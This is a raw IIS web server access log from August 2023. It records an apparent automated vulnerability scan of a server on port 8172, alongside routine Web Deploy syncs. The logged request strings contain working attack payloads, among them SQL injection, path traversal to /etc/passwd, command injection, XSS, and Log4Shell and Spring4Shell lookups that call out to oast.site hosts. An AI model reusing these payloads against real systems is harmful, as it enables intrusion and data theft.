103.153.214.94 GET /Assets/temp/hotspot/img/logohotspot.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 80 2023-08-03 05:49:19 103.153.214.94 GET /rest/domains/list sortCol=fullyQualifiedName&sortDir=asc 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 102 2023-08-03 05:54:47 103.153.214.94 GET /jsrpc.php type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 62 2023-08-03 06:01:11 103.153.214.94 GET /file-manager/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 85 2023-08-03 06:01:19 103.153.214.94 POST /file-manager/backend/makefile - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 77 2023-08-03 06:01:26 103.153.214.94 POST /file-manager/backend/text - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 58 2023-08-03 06:01:34 103.153.214.94 POST /file-manager/backend/permissions - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 73 2023-08-03 06:01:42 103.153.214.94 POST /filemanager/upload.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 81 2023-08-03 06:01:42 103.153.214.94 GET /XJP20IZv9X.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 80 2023-08-03 06:06:44 103.153.214.94 GET /yyoa/common/js/menu/test.jsp doType=101&S1=(SELECT%20md5(999999999)) 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 84 2023-08-03 06:09:32 103.153.214.94 POST /wp-admin/admin-ajax.php action=uploadFontIcon 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 81 2023-08-03 06:09:39 103.153.214.94 GET /wp-content/uploads/kaswara/fonts_icon/mgqepl/rq.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 88 2023-08-03 06:10:15 103.153.214.94 GET /pages/systemcall.php command=cat%20/etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 95 2023-08-03 06:19:18 103.153.214.94 GET /console/login/LoginForm.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 86 2023-08-03 06:22:25 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/whatever 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 84 2023-08-03 06:22:31 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/../../../context/2TSGVqs3uC6D9HyJZHj0YS1FuK3.cfm 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 87 2023-08-03 06:22:37 103.153.214.94 POST /lucee/2TSGVqs3uC6D9HyJZHj0YS1FuK3.cfm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 88 2023-08-03 06:25:20 103.153.214.94 GET /owa/auth/x.js - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 85 2023-08-03 06:34:08 103.153.214.94 GET /websso/SAML2/SSO/vsphere.local SAMLRequest 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 59 2023-08-03 06:37:31 103.153.214.94 GET /dumpmdm.cmd - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 60 2023-08-03 06:38:17 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 83 2023-08-03 06:38:23 103.153.214.94 POST /wp-login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 79 2023-08-03 06:38:30 103.153.214.94 GET /wp-admin/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 78 2023-08-03 06:46:16 103.153.214.94 GET /password.jsn - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 64 2023-08-03 06:50:08 103.153.214.94 POST /session/create - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 61 2023-08-03 06:50:29 103.153.214.94 POST /classes/Master.php f=delete_item 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 57 2023-08-03 06:54:57 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 109 2023-08-03 07:00:18 103.153.214.94 GET /v1/folder path=%2F 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 56 2023-08-03 07:04:10 103.153.214.94 POST /v2/query - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 60 2023-08-03 07:08:30 103.153.214.94 GET /passport/index.php action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 68 2023-08-03 07:13:03 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 55 2023-08-03 07:13:09 103.153.214.94 POST /cgi-bin/system_log.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 81 2023-08-03 07:16:50 103.153.214.94 GET /dynamic/instance-identity/document - 8172 - 111.90.143.37 - - 404 7 0 79 2023-08-03 07:16:56 103.153.214.94 GET /dynamic/instance-identity/document - 8172 - 111.90.143.37 - - 404 7 0 79 2023-08-03 07:22:02 103.153.214.94 GET /wp-content/plugins/usc-e-shop/functions/progress-check.php progressfile=../../../../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 61 2023-08-03 07:33:03 103.153.214.94 GET /html/setup.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 104 2023-08-03 07:33:14 103.153.214.94 POST /HandleEvent - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 84 2023-08-03 07:33:47 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172/diagnostic.html?t=201701020919 404 7 0 52 2023-08-03 07:39:26 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 76 2023-08-03 07:40:13 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 91 2023-08-03 07:40:20 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=http://cj5gsq24749fn87ofdl07o1qp7qjxn9mf.oast.site&class.module.classLoader.resources.context.configFile.content.aaa=xxx 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 104 2023-08-03 07:40:29 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 333 2023-08-03 07:40:35 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=https://cj5gsq24749fn87ofdl0w9qfddng9x3ot.oast.site&class.module.classLoader.resources.context.configFile.content.aaa=xxx 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 60 2023-08-03 07:45:30 103.153.214.94 GET /Admin - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 64 2023-08-03 07:46:13 103.153.214.94 POST /login - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 bcvt.kontum.gov.vn:8172/module/login/login.html 404 7 0 65 2023-08-03 07:46:40 103.153.214.94 GET /ui/vropspluginui/rest/services/getstatus - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 339 2023-08-03 07:54:53 103.153.214.94 POST /eps/resourceOperations/upload.action - 8172 - 111.90.143.37 MicroMessenger - 404 7 0 69 2023-08-03 07:58:51 103.153.214.94 GET /CMSInstall/install.aspx - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 62 2023-08-03 08:00:05 103.153.214.94 POST /goform/setSysAdm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.shtml 404 7 0 77 2023-08-03 08:00:16 103.153.214.94 POST /upload - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 59 2023-08-03 08:10:19 103.153.214.94 POST /logupload logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 99 2023-08-03 08:11:04 103.153.214.94 GET /cgi-bin/login LD_DEBUG=files 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 58 2023-08-03 08:13:30 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 - 171.231.147.222 - - 401 2 5 54 2023-08-03 08:13:30 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.147.222 - - 200 0 0 177 2023-08-03 08:13:30 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.147.222 - - 200 0 0 75 2023-08-03 08:13:32 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.147.222 - - 200 0 0 1790 2023-08-03 08:13:32 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.147.222 VSCmdLine:WTE6.0.6.36821;sid=fa5df83b-04a0-4734-a7a2-ace12b1f3c90;op=Sync - 200 0 0 925 2023-08-03 08:13:32 103.153.214.94 HEAD /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.147.222 - - 200 0 0 37 2023-08-03 08:13:35 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.147.222 VSCmdLine:WTE6.0.6.36821;sid=fa5df83b-04a0-4734-a7a2-ace12b1f3c90;op=Sync - 200 0 0 2349 2023-08-03 08:13:35 103.153.214.94 POST /msdeploy.axd site=kiemkegpmb.gdtsolutions.vn 8172 kiemke 171.231.147.222 - - 200 0 0 2544 2023-08-03 08:15:46 103.153.214.94 POST /wp-admin/admin-ajax.php action=wpt_admin_update_notice_option 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 79 2023-08-03 08:18:50 103.153.214.94 POST /login.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 85 2023-08-03 08:24:00 103.153.214.94 GET /logs/downloadMainLog fname=../../../../../../..//etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 59 2023-08-03 08:24:06 103.153.214.94 GET /logs/downloadMainLog fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 76 2023-08-03 08:26:27 103.153.214.94 POST /public/index.php/home/index/bind_follow/ publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 121 2023-08-03 08:26:32 103.153.214.94 GET /index.php s=/index/index/name/$%7B@phpinfo()%7D 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 84 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-08-03 08:41:58 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-08-03 08:41:58 103.153.214.94 POST /system/sharedir.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 68 2023-08-03 08:42:07 103.153.214.94 POST /en/php/usb_sync.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 85 2023-08-03 08:42:34 103.153.214.94 GET /plus/ajax_common.php act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 77 2023-08-03 08:43:20 103.153.214.94 GET /service/v1/service-details - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 62 2023-08-03 08:43:27 103.153.214.94 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 58 2023-08-03 08:43:36 103.153.214.94 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 98 2023-08-03 08:43:42 103.153.214.94 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 93 2023-08-03 08:43:50 103.153.214.94 GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 112 2023-08-03 08:43:57 103.153.214.94 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 85 2023-08-03 08:44:06 103.153.214.94 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 79 2023-08-03 08:48:22 103.153.214.94 GET /c42api/v3/LoginConfiguration username=${jndi:ldap://${:-499}${:-980}.${hostName}.username.cj5gsq24749fn87ofdl0xik1cg7wnpeab.oast.site/test}&url=https://localhost 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 92 2023-08-03 08:54:15 103.153.214.94 POST /webadmin/auth/verification.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/start/ 404 7 0 62 2023-08-03 08:57:23 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 13 2023-08-03 08:57:23 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 24 2023-08-03 08:57:23 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 19 2023-08-03 08:57:23 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=ea3ef570-b965-4fc5-88b7-8fff6b07916b;op=Sync - 200 0 0 287 2023-08-03 08:57:23 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 335 2023-08-03 08:57:23 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 17 2023-08-03 08:58:26 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=ea3ef570-b965-4fc5-88b7-8fff6b07916b;op=Sync - 200 0 0 62515 2023-08-03 08:58:26 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 62559 2023-08-03 08:59:23 103.153.214.94 POST /http/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 102 2023-08-03 09:00:41 103.153.214.94 GET /esp/cms_changeDeviceContext.esp device=aaaaa:a%27";user|s."1337"; 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 59 2023-08-03 09:01:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 20 2023-08-03 09:01:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 18 2023-08-03 09:01:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 73 2023-08-03 09:01:54 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=59a1c02b-90d1-4804-9bb8-e6459dc1fb80;op=Sync - 200 0 0 278 2023-08-03 09:01:54 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 435 2023-08-03 09:01:54 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 11 2023-08-03 09:02:56 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=59a1c02b-90d1-4804-9bb8-e6459dc1fb80;op=Sync - 200 0 0 61936 2023-08-03 09:02:56 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 61973 2023-08-03 09:05:29 103.153.214.94 GET /dr/authentication/oauth2/oauth2login error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-494%7D$%7B%3A-728%7D.$%7BhostName%7D.uri.cj5gsq24749fn87ofdl0nsyips51jbuj9.oast.site%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 85 2023-08-03 09:08:48 103.153.214.94 POST /integration/saveGangster.action - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 57 2023-08-03 09:09:53 103.153.214.94 GET /cgi-bin/ExportSettings.sh - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 86 2023-08-03 09:15:48 103.153.214.94 GET / - 8172 - 167.248.133.50 - - 404 7 0 232 2023-08-03 09:15:50 103.153.214.94 GET / - 8172 - 167.248.133.50 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 7 0 304 2023-08-03 09:19:08 103.153.214.94 GET /v1/metadata/private-networks - 8172 - 111.90.143.37 - - 404 7 0 77 2023-08-03 09:19:17 103.153.214.94 GET /v1/metadata/private-networks - 8172 - 111.90.143.37 - - 404 7 0 56 2023-08-03 09:22:22 103.153.214.94 POST /admin/ajax.php action=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 71 2023-08-03 09:22:31 103.153.214.94 GET /admin/index.php page=home 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 93 2023-08-03 09:22:46 103.153.214.94 POST /api/v1/login/oauth2/auth - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 136 2023-08-03 09:26:36 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 60 2023-08-03 09:26:41 103.153.214.94 POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 55 2023-08-03 09:35:50 103.153.214.94 POST /carbon/generic/save_artifact_ajaxprocessor.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 71 2023-08-03 09:35:54 103.153.214.94 GET /api/session/properties - 8172 - 111.90.143.37 